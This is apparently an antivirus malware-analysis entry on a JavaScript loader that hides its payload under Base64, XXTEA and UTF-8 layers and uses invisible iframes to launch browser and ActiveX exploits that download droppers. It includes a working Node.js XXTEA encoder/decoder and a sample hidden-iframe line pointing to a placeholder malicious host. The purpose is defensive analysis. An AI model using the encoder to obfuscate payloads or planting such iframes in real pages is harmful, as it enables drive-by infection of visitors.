
Trojan.Exploit.JS.RealPlr.S

MEDIUM
MEDIUM
approx. 35 KB

Symptoms

The malicious script doesn't have any obvious symptoms.

Removal instructions:

Please let BitDefender disinfect your files.

Analyzed By

Daniel Chipiristeanu, virus researcher

Technical Description:

The malicious script, written in JavaScript, simply adds new layers of encoding on top of the well-known recent exploits already described in other malware entries, such as Exploit.SinaDloader.B, as we will see later on.

First, let us describe the protection layer the script uses. Basically, a variable holds the encrypted string which, after decryption, is written into the HTML page using "document.write". Decoding the actual malicious JavaScript takes three steps, because the string is protected with a) Base64 encoding, b) the XXTEA encryption algorithm, and c) a conversion from UTF-8 to UTF-16.
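The three-layer wrapper described above, as an added example that is not the script's own code: a small Node.js decoder (plus the matching encoder, used only to build a constructed sample) that peels off Base64, XXTEA and UTF-8 so an analyst can read the string handed to document.write. The key, the byte/word packing and the sample text are assumptions; the real script's key and packing details are not on this page.

```javascript
const DELTA = 0x9e3779b9; // XXTEA round constant; mx() below keeps every intermediate as unsigned 32-bit
function mx(sum, y, z, p, e, k) {
  return ((((z >>> 5) ^ (y << 2)) + ((y >>> 3) ^ (z << 4))) ^ ((sum ^ y) + (k[(p & 3) ^ e] ^ z))) >>> 0;
}
// Corrected Block TEA over an array of uint32 words, modified in place; k is a 4-word (128-bit) key.
function xxteaEncrypt(v, k) {
  const n = v.length;
  let rounds = 6 + Math.floor(52 / n), sum = 0, z = v[n - 1], y;
  while (rounds-- > 0) {
    sum = (sum + DELTA) >>> 0;
    const e = (sum >>> 2) & 3;
    for (let p = 0; p < n - 1; p++) { y = v[p + 1]; z = v[p] = (v[p] + mx(sum, y, z, p, e, k)) >>> 0; }
    y = v[0]; z = v[n - 1] = (v[n - 1] + mx(sum, y, z, n - 1, e, k)) >>> 0;
  }
  return v;
}
function xxteaDecrypt(v, k) {
  const n = v.length;
  let rounds = 6 + Math.floor(52 / n), sum = (rounds * DELTA) >>> 0, y = v[0], z;
  while (rounds-- > 0) {
    const e = (sum >>> 2) & 3;
    for (let p = n - 1; p > 0; p--) { z = v[p - 1]; y = v[p] = (v[p] - mx(sum, y, z, p, e, k)) >>> 0; }
    z = v[n - 1]; y = v[0] = (v[0] - mx(sum, y, z, 0, e, k)) >>> 0;
    sum = (sum - DELTA) >>> 0;
  }
  return v;
}
// Little-endian byte <-> word packing, zero padded to at least two words (XXTEA needs n >= 2); an assumption.
function bytesToWords(bytes) {
  const w = new Array(Math.max(2, Math.ceil(bytes.length / 4))).fill(0);
  for (let i = 0; i < bytes.length; i++) w[i >> 2] = (w[i >> 2] | (bytes[i] << ((i & 3) * 8))) >>> 0;
  return w;
}
function wordsToBytes(words) {
  const out = [];
  for (const w of words) for (let s = 0; s < 32; s += 8) out.push((w >>> s) & 0xff);
  return Buffer.from(out);
}
// Outer layer in the order the page lists it: UTF-8 encode, XXTEA, Base64 (used here only to build the sample).
function packPayload(plaintext, key) {
  return wordsToBytes(xxteaEncrypt(bytesToWords(Buffer.from(plaintext, 'utf8')), key)).toString('base64');
}
// Analyst side: Base64 decode, XXTEA decrypt, UTF-8 decode, then drop the zero padding.
function unpackPayload(b64, key) {
  const words = xxteaDecrypt(bytesToWords(Buffer.from(b64, 'base64')), key);
  return wordsToBytes(words).toString('utf8').replace(/\0+$/, '');
}
const SAMPLE_KEY = [0x0badf00d, 0xdeadbeef, 0x01234567, 0x89abcdef]; // constructed, not the script's key
const SAMPLE_PLAIN = 'document.write("<iframe src=\\"http://[malicious_site].cn/\\" width=0 height=0></iframe>")';
console.log(unpackPayload(packPayload(SAMPLE_PLAIN, SAMPLE_KEY), SAMPLE_KEY));
```

On a real sample, replace packPayload's output with the Base64 string pulled from the script's variable and supply the key the script embeds.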

After decryption, different versions perform different actions. Since this type of encryption is widespread on malicious sites, the actions below were taken from a version involved in the Trojan.Exploit.SSX infection campaign; they help the user understand the effect of the malware on an affected computer.



The preferred delivery technique is still the "invisible iframe" attack.

    * Creates two invisible iframes. The first points to an exploit for the Snapshot Viewer described here, and the second downloads some SWF (Adobe Flash) files that are detected as Exploit.SWF.Gen.

    * If the "User Agent" is msie7 (Internet Explorer 7), it creates an invisible iframe pointing to [malicious_site].cn/a2/ms06014.htm, which uses the MS06-014 RDS.DataControl exploit in Microsoft Data Access Components and downloads a file detected as Trojan.Dropper.Replacer.A.

    * Lianzhong chat room (GLIEDown.IEDown.1) exploit found in [malicious_site].cna2/GLWORLD.html (detected as Trojan.Exploit.JS.G), which downloads [malicious_site].cn/new/a4.css (Trojan.Dropper.Replacer.A).

    * [malicious_site].cn/sina.htm (DownloadAndInstall exploit), which downloads [malicious_site].cn/down/sina.exe (heuristically detected as Generic.Malware.SYBdld.1FBF30D9).

    * UUUpgrade ActiveX control module-update exploit (UUUPGRADE.UUUpgradeCtrl.1 component), which downloads [malicious_site].cn/UU.htm (unavailable at analysis time).

    * Xunlei Thunder exploit (ActiveXObject DPClient.Vod) found in [malicious_site].cn/a2/Thunder.html, downloading [malicious_site].cn/down/ko.css (detected as Trojan.Dropper.Replacer.A).

    * RealPlayer exploit (IERPCtl.IERPCtl.1 component) for versions older than 6.0.14.552, which finally downloads [malicious_site].cn/down/ko.css (detected as Trojan.Dropper.Replacer.A).



* malicious_site is an umbrella term for websites hosting malware; the actual host differs between samples and changes over time.